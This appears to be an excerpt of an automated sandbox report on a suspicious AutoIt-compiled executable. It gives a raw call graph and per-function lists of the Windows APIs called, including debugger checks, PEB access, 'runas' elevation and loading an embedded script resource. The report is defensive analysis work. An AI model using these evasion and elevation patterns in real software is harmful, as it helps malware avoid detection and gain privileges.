102788 607667 59 API calls 102787->102788 102789 6045b9 102788->102789 102790 607667 59 API calls 102789->102790 102791 6045c1 102790->102791 102792 607667 59 API calls 102791->102792 102793 6045c9 102792->102793 102794 63d4d2 102793->102794 102795 6045fd 102793->102795 102796 608047 59 API calls 102794->102796 102797 60784b 59 API calls 102795->102797 102798 63d4db 102796->102798 102799 60460b 102797->102799 102800 607d8c 59 API calls 102798->102800 102801 607d2c 59 API calls 102799->102801 102802 604640 102800->102802 102803 604615 102801->102803 102805 604680 102802->102805 102807 60465f 102802->102807 102818 63d4fb 102802->102818 102803->102802 102804 60784b 59 API calls 102803->102804 102808 604636 102804->102808 102859 60784b 102805->102859 102809 6079f2 59 API calls 102807->102809 102812 607d2c 59 API calls 102808->102812 102813 604669 102809->102813 102810 604691 102814 6046a3 102810->102814 102816 608047 59 API calls 102810->102816 102811 63d5cb 102815 607bcc 59 API calls 102811->102815 102812->102802 102813->102805 102820 60784b 59 API calls 102813->102820 102817 6046b3 102814->102817 102821 608047 59 API calls 102814->102821 102831 63d588 102815->102831 102816->102814 102819 6046ba 102817->102819 102823 608047 59 API calls 102817->102823 102818->102811 102822 63d5b4 102818->102822 102830 63d532 102818->102830 102824 608047 59 API calls 102819->102824 102833 6046c1 Mailbox 102819->102833 102820->102805 102821->102817 102822->102811 102827 63d59f 102822->102827 102823->102819 102824->102833 102825 6079f2 59 API calls 102825->102831 102826 63d590 102828 607bcc 59 API calls 102826->102828 102829 607bcc 59 API calls 102827->102829 102828->102831 102829->102831 102830->102826 102834 63d57b 102830->102834 102831->102805 102831->102825 102872 607924 59 API calls 2 library calls 102831->102872 102833->102698 102835 607bcc 59 API calls 102834->102835 102835->102831 102836->102744 102837->102744 102838->102744 102839->102744 102840->102744 102841->102744 102842->102744 102844 605c88 102843->102844 102845 605c79 102843->102845 102844->102845 102846 605c8d CloseHandle 102844->102846 102845->102724 102846->102845 102847->102668 102848->102675 102849->102703 102850->102738 102851->102738 102852->102738 102853->102738 102854->102727 102855->102730 102856->102753 102857->102731 102858->102737 102860 6078b7 102859->102860 102861 60785a 102859->102861 102862 607d2c 59 API calls 102860->102862 102861->102860 102863 607865 102861->102863 102868 607888 _memmove 102862->102868 102864 607880 102863->102864 102865 63eb09 102863->102865 102873 607f27 59 API calls Mailbox 102864->102873 102867 608029 59 API calls 102865->102867 102869 63eb13 102867->102869 102868->102810 102870 620db6 Mailbox 59 API calls 102869->102870 102871 63eb33 102870->102871 102872->102831 102873->102868 102875 606d95 102874->102875 102880 606ea9 102874->102880 102876 620db6 Mailbox 59 API calls 102875->102876 102875->102880 102878 606dbc 102876->102878 102877 620db6 Mailbox 59 API calls 102884 606e31 102877->102884 102878->102877 102880->101507 102882 60735d 59 API calls 102882->102884 102883 60750f 59 API calls 102883->102884 102884->102880 102884->102882 102884->102883 102887 606240 102884->102887 102912 656553 59 API calls Mailbox 102884->102912 102885->101509 102886->101511 102888 607a16 59 API calls 102887->102888 102904 606265 102888->102904 102889 60646a 102890 60750f 59 API calls 102889->102890 102891 606484 Mailbox 102890->102891 102891->102884 102894 63dff6 102917 65f8aa 91 API calls 4 library calls 102894->102917 102895 60750f 59 API calls 102895->102904 102898 606799 _memmove 102918 65f8aa 91 API calls 4 library calls 102898->102918 102900 607d8c 59 API calls 102900->102904 102901 63e004 102902 60750f 59 API calls 102901->102902 102903 63e01a 102902->102903 102903->102891 102904->102889 102904->102894 102904->102895 102904->102898 102904->102900 102905 63df92 102904->102905 102909 607e4f 59 API calls 102904->102909 102913 605f6c 60 API calls 102904->102913 102914 605d41 59 API calls Mailbox 102904->102914 102915 605e72 60 API calls 102904->102915 102916 607924 59 API calls 2 library calls 102904->102916 102906 608029 59 API calls 102905->102906 102907 63df9d 102906->102907 102911 620db6 Mailbox 59 API calls 102907->102911 102910 60643b CharUpperBuffW 102909->102910 102910->102904 102911->102898 102912->102884 102913->102904 102914->102904 102915->102904 102916->102904 102917->102901 102918->102891 102919->101525 102920->101526 102922 60e6d5 102921->102922 102923 643aa9 102922->102923 102925 60e73f 102922->102925 102936 60e799 102922->102936 103106 609ea0 102923->103106 102929 607667 59 API calls 102925->102929 102925->102936 102927 607667 59 API calls 102927->102936 102931 643b04 102929->102931 102930 622d40 __cinit 67 API calls 102930->102936 102932 643b26 102932->101603 102934 6084c0 69 API calls 102951 60e970 Mailbox 102934->102951 102935 609ea0 341 API calls 102935->102951 102936->102927 102936->102930 102936->102932 102937 60e95a 102936->102937 102936->102951 102937->102951 103131 669e4a 89 API calls 4 library calls 102937->103131 102939 608d40 59 API calls 102939->102951 102940 609c90 Mailbox 59 API calls 102940->102951 102948 669e4a 89 API calls 102948->102951 102949 60f195 102950 60ea78 102950->101603 102951->102934 102951->102935 102951->102939 102951->102940 102951->102948 102951->102949 102951->102950 103105 607f77 59 API calls 2 library calls 102951->103105 103132 656e8f 59 API calls 102951->103132 103133 67c5c3 341 API calls 102951->103133 103134 67b53c 341 API calls Mailbox 102951->103134 103136 6793c6 341 API calls Mailbox 102951->103136 102953 60f650 102952->102953 102954 60f4ba 102952->102954 102957 607de1 59 API calls 102953->102957 102955 60f4c6 102954->102955 102956 64441e 102954->102956 103238 60f290 341 API calls 2 library calls 102955->103238 103239 67bc6b 341 API calls Mailbox 102956->103239 102963 60f58c Mailbox 102957->102963 102960 64442c 102962 60f4fd 102962->102960 102962->102963 102969 604e4a 84 API calls 102963->102969 103143 67df37 102963->103143 103146 663c37 102963->103146 103149 67445a 102963->103149 103158 66cb7a 102963->103158 102973 603212 102972->102973 102975 6031e0 102972->102975 102973->101603 102974 603205 IsDialogMessageW 102974->102973 102974->102975 102975->102973 102975->102974 102976 63cf32 GetClassLongW 102975->102976 102976->102974 102976->102975 102977->101603 103455 608180 102978->103455 102980 60fd3d 102982 64472d 102980->102982 103027 6106f6 102980->103027 103460 60f234 102980->103460 103474 669e4a 89 API calls 4 library calls 102982->103474 103058->101533 103060->101603 103061->101540 103062->101540 103063->101540 103064->101603 103065->101603 103066->101603 103068 609851 103067->103068 103069 60984b 103067->103069 103070 63f5d3 __i64tow 103068->103070 103071 609899 103068->103071 103073 609857 __itow 103068->103073 103076 63f4da 103068->103076 103069->101603 103498 623698 83 API calls 3 library calls 103071->103498 103075 620db6 Mailbox 59 API calls 103073->103075 103077 609871 103075->103077 103079 620db6 Mailbox 59 API calls 103076->103079 103080 63f552 Mailbox _wcscpy 103076->103080 103077->103069 103081 63f51f 103079->103081 103499 623698 83 API calls 3 library calls 103080->103499 103085->101603 103086->101603 103088 63eda1 103087->103088 103091 6082f2 103087->103091 103089 63edb1 103088->103089 103500 6561a4 59 API calls 103088->103500 103092 60831c 103091->103092 103093 6085c0 59 API calls 103091->103093 103097 608339 Mailbox 103091->103097 103094 608322 103092->103094 103095 6085c0 59 API calls 103092->103095 103093->103092 103096 609c90 Mailbox 59 API calls 103094->103096 103094->103097 103095->103094 103096->103097 103097->101603 103098->101589 103099->101589 103100->101589 103101->101589 103102->101589 103103->101589 103104->101589 103105->102951 103107 609ebf 103106->103107 103120 609eed Mailbox 103106->103120 103108 620db6 Mailbox 59 API calls 103107->103108 103108->103120 103109 60b475 103111 60b47a 103113 640055 103111->103113 103114 620db6 59 API calls Mailbox 103114->103120 103118 60a057 103119 608047 59 API calls 103119->103120 103120->103109 103120->103111 103120->103113 103120->103114 103120->103118 103120->103119 103123 607667 59 API calls 103120->103123 103125 622d40 67 API calls __cinit 103120->103125 103126 656e8f 59 API calls 103120->103126 103127 6409d6 103120->103127 103129 60a55a 103120->103129 103123->103120 103125->103120 103126->103120 103131->102951 103132->102951 103133->102951 103134->102951 103136->102951 103238->102962 103239->102960 103456 60818f 103455->103456 103459 6081aa 103455->103459 103457 607e4f 59 API calls 103456->103457 103458 608197 CharUpperBuffW 103457->103458 103458->103459 103459->102980 103498->103073 103499->103070 103500->103089 103501 63fe27 103514 61f944 103501->103514 103503 63fe3d 103504 63fe53 103503->103504 103505 63febe 103503->103505 103523 609e5d 60 API calls 103504->103523 103508 60fce0 341 API calls 103505->103508 103507 63fe92 103509 64089c 103507->103509 103510 63fe9a 103507->103510 103513 63feb2 Mailbox 103508->103513 103525 669e4a 89 API calls 4 library calls 103509->103525 103524 66834f 59 API calls Mailbox 103510->103524 103515 61f950 103514->103515 103516 61f962 103514->103516 103517 609d3c 60 API calls 103515->103517 103518 61f991 103516->103518 103519 61f968 103516->103519 103522 61f95a 103517->103522 103520 609d3c 60 API calls 103518->103520 103521 620db6 Mailbox 59 API calls 103519->103521 103520->103522 103521->103522 103522->103503 103523->103507 103524->103513 103525->103513 103526 1644110 103540 1641d60 103526->103540 103528 16441dd 103543 1644000 103528->103543 103546 1645200 GetPEB 103540->103546 103542 16423eb 103542->103528 103544 1644009 Sleep 103543->103544 103545 1644017 103544->103545 103547 164522a 103546->103547 103547->103542 103548 601055 103553 602649 103548->103553 103551 622d40 __cinit 67 API calls 103552 601064 103551->103552 103554 607667 59 API calls 103553->103554 103555 6026b7 103554->103555 103560 603582 103555->103560 103558 602754 103559 60105a 103558->103559 103563 603416 59 API calls 2 library calls 103558->103563 103559->103551 103564 6035b0 103560->103564 103563->103558 103565 6035bd 103564->103565 103566 6035a1 103564->103566 103565->103566 103567 6035c4 RegOpenKeyExW 103565->103567 103566->103558 103567->103566 103568 6035de RegQueryValueExW 103567->103568 103569 603614 RegCloseKey 103568->103569 103570 6035ff 103568->103570 103569->103566 103570->103569 103571 601066 103576 60f76f 103571->103576 103573 60106c 103574 622d40 __cinit 67 API calls 103573->103574 103575 601076 103574->103575 103577 60f790 103576->103577 103609 61ff03 103577->103609 103581 60f7d7 103582 607667 59 API calls 103581->103582 103583 60f7e1 103582->103583 103584 607667 59 API calls 103583->103584 103585 60f7eb 103584->103585 103586 607667 59 API calls 103585->103586 103587 60f7f5 103586->103587 103588 607667 59 API calls 103587->103588 103589 60f833 103588->103589 103590 607667 59 API calls 103589->103590 103591 60f8fe 103590->103591 103619 615f87 103591->103619 103595 60f930 103596 607667 59 API calls 103595->103596 103597 60f93a 103596->103597 103647 61fd9e 103597->103647 103599 60f981 103600 60f991 GetStdHandle 103599->103600 103601 60f9dd 103600->103601 103602 6445ab 103600->103602 103603 60f9e5 OleInitialize 103601->103603 103602->103601 103604 6445b4 103602->103604 103603->103573 103654 666b38 64 API calls Mailbox 103604->103654 103606 6445bb 103655 667207 CreateThread 103606->103655 103608 6445c7 CloseHandle 103608->103603 103656 61ffdc 103609->103656 103612 61ffdc 59 API calls 103613 61ff45 103612->103613 103614 607667 59 API calls 103613->103614 103615 61ff51 103614->103615 103616 607bcc 59 API calls 103615->103616 103617 60f796 103616->103617 103618 620162 6 API calls 103617->103618 103618->103581 103620 607667 59 API calls 103619->103620 103621 615f97 103620->103621 103622 607667 59 API calls 103621->103622 103623 615f9f 103622->103623 103663 615a9d 103623->103663 103626 615a9d 59 API calls 103627 615faf 103626->103627 103628 607667 59 API calls 103627->103628 103629 615fba 103628->103629 103630 620db6 Mailbox 59 API calls 103629->103630 103631 60f908 103630->103631 103632 6160f9 103631->103632 103633 616107 103632->103633 103634 607667 59 API calls 103633->103634 103635 616112 103634->103635 103636 607667 59 API calls 103635->103636 103637 61611d 103636->103637 103638 607667 59 API calls 103637->103638 103639 616128 103638->103639 103640 607667 59 API calls 103639->103640 103641 616133 103640->103641 103642 615a9d 59 API calls 103641->103642 103643 61613e 103642->103643 103644 620db6 Mailbox 59 API calls 103643->103644 103645 616145 RegisterWindowMessageW 103644->103645 103645->103595 103648 65576f 103647->103648 103649 61fdae 103647->103649 103666 669ae7 60 API calls 103648->103666 103650 620db6 Mailbox 59 API calls 103649->103650 103653 61fdb6 103650->103653 103652 65577a 103653->103599 103654->103606 103655->103608 103667 6671ed 65 API calls 103655->103667 103657 607667 59 API calls 103656->103657 103658 61ffe7 103657->103658 103659 607667 59 API calls 103658->103659 103660 61ffef 103659->103660 103661 607667 59 API calls 103660->103661 103662 61ff3b 103661->103662 103662->103612 103664 607667 59 API calls 103663->103664 103665 615aa5 103664->103665 103665->103626 103666->103652 103668 601016 103673 604974 103668->103673 103671 622d40 __cinit 67 API calls 103672 601025 103671->103672 103674 620db6 Mailbox 59 API calls 103673->103674 103675 60497c 103674->103675 103676 60101b 103675->103676 103680 604936 103675->103680 103676->103671 103681 604951 103680->103681 103682 60493f 103680->103682 103684 6049a0 103681->103684 103683 622d40 __cinit 67 API calls 103682->103683 103683->103681 103685 607667 59 API calls 103684->103685 103686 6049b8 GetVersionExW 103685->103686 103687 607bcc 59 API calls 103686->103687 103688 6049fb 103687->103688 103689 607d2c 59 API calls 103688->103689 103698 604a28 103688->103698 103690 604a1c 103689->103690 103691 607726 59 API calls 103690->103691 103691->103698 103692 604a93 GetCurrentProcess IsWow64Process 103693 604aac 103692->103693 103695 604ac2 103693->103695 103696 604b2b GetSystemInfo 103693->103696 103694 63d864 103708 604b37 103695->103708 103697 604af8 103696->103697 103697->103676 103698->103692 103698->103694 103701 604ad4 103704 604b37 2 API calls 103701->103704 103702 604b1f GetSystemInfo 103703 604ae9 103702->103703 103703->103697 103705 604aef FreeLibrary 103703->103705 103707 604adc GetNativeSystemInfo 103704->103707 103705->103697 103707->103703 103709 604ad0 103708->103709 103710 604b40 LoadLibraryA 103708->103710 103709->103701 103709->103702 103710->103709 103711 604b51 GetProcAddress 103710->103711 103711->103709 103712 64416f 103716 655fe6 103712->103716 103714 64417a 103715 655fe6 85 API calls 103714->103715 103715->103714 103717 656020 103716->103717 103722 655ff3 103716->103722 103717->103714 103718 656022 103728 609328 84 API calls Mailbox 103718->103728 103720 656027 103721 609837 84 API calls 103720->103721 103723 65602e 103721->103723 103722->103717 103722->103718 103722->103720 103725 65601a 103722->103725 103724 607b2e 59 API calls 103723->103724 103724->103717 103727 6095a0 59 API calls _wcsstr 103725->103727 103727->103717 103728->103720 103729 60107d 103734 60708b 103729->103734 103731 60108c 103732 622d40 __cinit 67 API calls 103731->103732 103733 601096 103732->103733 103735 60709b __ftell_nolock 103734->103735 103736 607667 59 API calls 103735->103736 103737 607151 103736->103737 103738 604706 61 API calls 103737->103738 103739 60715a 103738->103739 103765 62050b 103739->103765 103742 607cab 59 API calls 103743 607173 103742->103743 103744 603f74 59 API calls 103743->103744 103745 607182 103744->103745 103746 607667 59 API calls 103745->103746 103747 60718b 103746->103747 103748 607d8c 59 API calls 103747->103748 103749 607194 RegOpenKeyExW 103748->103749 103750 63e8b1 RegQueryValueExW 103749->103750 103754 6071b6 Mailbox 103749->103754 103751 63e943 RegCloseKey 103750->103751 103752 63e8ce 103750->103752 103751->103754 103761 63e955 _wcscat Mailbox __NMSG_WRITE 103751->103761 103753 620db6 Mailbox 59 API calls 103752->103753 103755 63e8e7 103753->103755 103754->103731 103757 60522e 59 API calls 103755->103757 103756 6079f2 59 API calls 103756->103761 103758 63e8f2 RegQueryValueExW 103757->103758 103759 63e90f 103758->103759 103762 63e929 103758->103762 103760 607bcc 59 API calls 103759->103760 103760->103762 103761->103754 103761->103756 103763 607de1 59 API calls 103761->103763 103764 603f74 59 API calls 103761->103764 103762->103751 103763->103761 103764->103761 103766 631940 __ftell_nolock 103765->103766 103767 620518 GetFullPathNameW 103766->103767 103768 62053a 103767->103768 103769 607bcc 59 API calls 103768->103769 103770 607165 103769->103770 103770->103742 103771 63fdfc 103795 60ab30 Mailbox _memmove 103771->103795 103774 609c90 Mailbox 59 API calls 103774->103795 103775 60b525 103831 669e4a 89 API calls 4 library calls 103775->103831 103778 620db6 59 API calls Mailbox 103796 609f37 Mailbox 103778->103796 103779 6409e5 103836 669e4a 89 API calls 4 library calls 103779->103836 103780 640055 103830 669e4a 89 API calls 4 library calls 103780->103830 103781 60a55a 103834 669e4a 89 API calls 4 library calls 103781->103834 103782 60a057 103784 60b475 103789 608047 59 API calls 103784->103789 103787 640064 103789->103782 103791 60b47a 103791->103779 103791->103780 103792 607667 59 API calls 103792->103796 103794 608047 59 API calls 103794->103796 103795->103774 103795->103775 103795->103782 103795->103796 103798 607de1 59 API calls 103795->103798 103804 60b2b6 103795->103804 103805 609ea0 341 API calls 103795->103805 103807 64086a 103795->103807 103809 640878 103795->103809 103811 64085c 103795->103811 103812 60b21c 103795->103812 103814 620db6 59 API calls Mailbox 103795->103814 103817 656e8f 59 API calls 103795->103817 103819 67df23 103795->103819 103825 67c193 85 API calls 2 library calls 103795->103825 103826 67c2e0 96 API calls Mailbox 103795->103826 103827 667956 59 API calls Mailbox 103795->103827 103828 67bc6b 341 API calls Mailbox 103795->103828 103829 65617e 59 API calls Mailbox 103795->103829 103796->103778 103796->103780 103796->103781 103796->103782 103796->103784 103796->103791 103796->103792 103796->103794 103797 656e8f 59 API calls 103796->103797 103799 6409d6 103796->103799 103800 622d40 67 API calls __cinit 103796->103800 103822 60c8c0 341 API calls 2 library calls 103796->103822 103823 60b900 60 API calls Mailbox 103796->103823 103797->103796 103798->103795 103835 669e4a 89 API calls 4 library calls 103799->103835 103800->103796 103824 60f6a3 341 API calls 103804->103824 103805->103795 103808 609c90 Mailbox 59 API calls 103807->103808 103808->103811 103833 669e4a 89 API calls 4 library calls 103809->103833 103811->103782 103832 65617e 59 API calls Mailbox 103811->103832 103813 609d3c 60 API calls 103812->103813 103815 60b22d 103813->103815 103814->103795 103816 609d3c 60 API calls 103815->103816 103816->103804 103817->103795 103820 67cadd 130 API calls 103819->103820 103821 67df33 103820->103821 103821->103795 103822->103796 103823->103796 103824->103775 103825->103795 103826->103795 103827->103795 103828->103795 103829->103795 103830->103787 103831->103811 103832->103782 103833->103811 103834->103782 103835->103779 103836->103782

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00603B68
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00603B7A
                                                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,006C52F8,006C52E0,?,?), ref: 00603BEB
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                  • Part of subcall function 0061092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00603C14,006C52F8,?,?,?), ref: 0061096E
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00603C6F
                                                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006B7770,00000010), ref: 0063D281
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,006C52F8,?,?,?), ref: 0063D2B9
                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006B4260,006C52F8,?,?,?), ref: 0063D33F
                                                                                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 0063D346
                                                                                                                  • Part of subcall function 00603A46: GetSysColorBrush.USER32(0000000F), ref: 00603A50
                                                                                                                  • Part of subcall function 00603A46: LoadCursorW.USER32(00000000,00007F00), ref: 00603A5F
                                                                                                                  • Part of subcall function 00603A46: LoadIconW.USER32(00000063), ref: 00603A76
                                                                                                                  • Part of subcall function 00603A46: LoadIconW.USER32(000000A4), ref: 00603A88
                                                                                                                  • Part of subcall function 00603A46: LoadIconW.USER32(000000A2), ref: 00603A9A
                                                                                                                  • Part of subcall function 00603A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00603AC0
                                                                                                                  • Part of subcall function 00603A46: RegisterClassExW.USER32(?), ref: 00603B16
                                                                                                                  • Part of subcall function 006039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00603A03
                                                                                                                  • Part of subcall function 006039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603A24
                                                                                                                  • Part of subcall function 006039D5: ShowWindow.USER32(00000000,?,?), ref: 00603A38
                                                                                                                  • Part of subcall function 006039D5: ShowWindow.USER32(00000000,?,?), ref: 00603A41
                                                                                                                  • Part of subcall function 0060434A: _memset.LIBCMT ref: 00604370
                                                                                                                  • Part of subcall function 0060434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00604415
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                • String ID: This is a third-party compiled AutoIt script.$runas$%i
                                                                                                                • API String ID: 529118366-2620332297
                                                                                                                • Opcode ID: 3b6d1afdfb4d58384938c2a6e2e0df62b792b31e874af5ff7e141bc2f8a4431c
                                                                                                                • Instruction ID: 9423d52e782c90598a4e042ad48cdab4038c427b4b466c3a24c37d3f53aefc1f
                                                                                                                • Opcode Fuzzy Hash: 3b6d1afdfb4d58384938c2a6e2e0df62b792b31e874af5ff7e141bc2f8a4431c
                                                                                                                • Instruction Fuzzy Hash: A351D470D44108AEDB19EBB4EC05EFF7BBBEB45301F005169F412A22E1DAB46B85CB65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1037 6049a0-604a00 call 607667 GetVersionExW call 607bcc 1042 604a06 1037->1042 1043 604b0b-604b0d 1037->1043 1044 604a09-604a0e 1042->1044 1045 63d767-63d773 1043->1045 1047 604b12-604b13 1044->1047 1048 604a14 1044->1048 1046 63d774-63d778 1045->1046 1049 63d77b-63d787 1046->1049 1050 63d77a 1046->1050 1051 604a15-604a4c call 607d2c call 607726 1047->1051 1048->1051 1049->1046 1052 63d789-63d78e 1049->1052 1050->1049 1060 604a52-604a53 1051->1060 1061 63d864-63d867 1051->1061 1052->1044 1054 63d794-63d79b 1052->1054 1054->1045 1056 63d79d 1054->1056 1059 63d7a2-63d7a5 1056->1059 1062 604a93-604aaa GetCurrentProcess IsWow64Process 1059->1062 1063 63d7ab-63d7c9 1059->1063 1060->1059 1064 604a59-604a64 1060->1064 1065 63d880-63d884 1061->1065 1066 63d869 1061->1066 1067 604aac 1062->1067 1068 604aaf-604ac0 1062->1068 1063->1062 1069 63d7cf-63d7d5 1063->1069 1070 63d7ea-63d7f0 1064->1070 1071 604a6a-604a6c 1064->1071 1073 63d886-63d88f 1065->1073 1074 63d86f-63d878 1065->1074 1072 63d86c 1066->1072 1067->1068 1076 604ac2-604ad2 call 604b37 1068->1076 1077 604b2b-604b35 GetSystemInfo 1068->1077 1078 63d7d7-63d7da 1069->1078 1079 63d7df-63d7e5 1069->1079 1082 63d7f2-63d7f5 1070->1082 1083 63d7fa-63d800 1070->1083 1080 604a72-604a75 1071->1080 1081 63d805-63d811 1071->1081 1072->1074 1073->1072 1075 63d891-63d894 1073->1075 1074->1065 1075->1074 1094 604ad4-604ae1 call 604b37 1076->1094 1095 604b1f-604b29 GetSystemInfo 1076->1095 1084 604af8-604b08 1077->1084 1078->1062 1079->1062 1088 63d831-63d834 1080->1088 1089 604a7b-604a8a 1080->1089 1085 63d813-63d816 1081->1085 1086 63d81b-63d821 1081->1086 1082->1062 1083->1062 1085->1062 1086->1062 1088->1062 1091 63d83a-63d84f 1088->1091 1092 604a90 1089->1092 1093 63d826-63d82c 1089->1093 1096 63d851-63d854 1091->1096 1097 63d859-63d85f 1091->1097 1092->1062 1093->1062 1102 604ae3-604ae7 GetNativeSystemInfo 1094->1102 1103 604b18-604b1d 1094->1103 1098 604ae9-604aed 1095->1098 1096->1062 1097->1062 1098->1084 1101 604aef-604af2 FreeLibrary 1098->1101 1101->1084 1102->1098 1103->1102
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 006049CD
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                • GetCurrentProcess.KERNEL32(?,0068FAEC,00000000,00000000,?), ref: 00604A9A
                                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 00604AA1
                                                                                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00604AE7
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00604AF2
                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00604B23
                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00604B2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1986165174-0
                                                                                                                • Opcode ID: 9cdfa3f5719b9a4e892becce5c09100c15a1965fd3b42c4df626bbec42112544
                                                                                                                • Instruction ID: cc4e8b47014636ad417594f199c78a06487727e21c7a014b1ddacd3b96b99f62
                                                                                                                • Opcode Fuzzy Hash: 9cdfa3f5719b9a4e892becce5c09100c15a1965fd3b42c4df626bbec42112544
                                                                                                                • Instruction Fuzzy Hash: A291C3719C97C0DACB35DB6894501EBBFF6AF29300F444AADD1C693B81D631B908C769

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1104 604e89-604ea1 CreateStreamOnHGlobal 1105 604ec1-604ec6 1104->1105 1106 604ea3-604eba FindResourceExW 1104->1106 1107 63d933-63d942 LoadResource 1106->1107 1108 604ec0 1106->1108 1107->1108 1109 63d948-63d956 SizeofResource 1107->1109 1108->1105 1109->1108 1110 63d95c-63d967 LockResource 1109->1110 1110->1108 1111 63d96d-63d98b 1110->1111 1111->1108
                                                                                                                APIs
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00604D8E,?,?,00000000,00000000), ref: 00604E99
                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00604D8E,?,?,00000000,00000000), ref: 00604EB0
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,00604D8E,?,?,00000000,00000000,?,?,?,?,?,?,00604E2F), ref: 0063D937
                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00604D8E,?,?,00000000,00000000,?,?,?,?,?,?,00604E2F), ref: 0063D94C
                                                                                                                • LockResource.KERNEL32(00604D8E,?,?,00604D8E,?,?,00000000,00000000,?,?,?,?,?,?,00604E2F,00000000), ref: 0063D95F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                • String ID: SCRIPT
                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                • Opcode ID: 9ef8ac4b8ed1d905a501013a76f061d7f30d426a54424972e362770079e9f805
                                                                                                                • Instruction ID: edada8d0591d0c9e22cc69b13916664b5b501be39ee745d9b26f6dc7a038ad41
                                                                                                                • Opcode Fuzzy Hash: 9ef8ac4b8ed1d905a501013a76f061d7f30d426a54424972e362770079e9f805
                                                                                                                • Instruction Fuzzy Hash: 5B115EB5240700BFD7258BA5EC48F677BBBFBC5B11F204668F506C62A0DB61E8018760
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
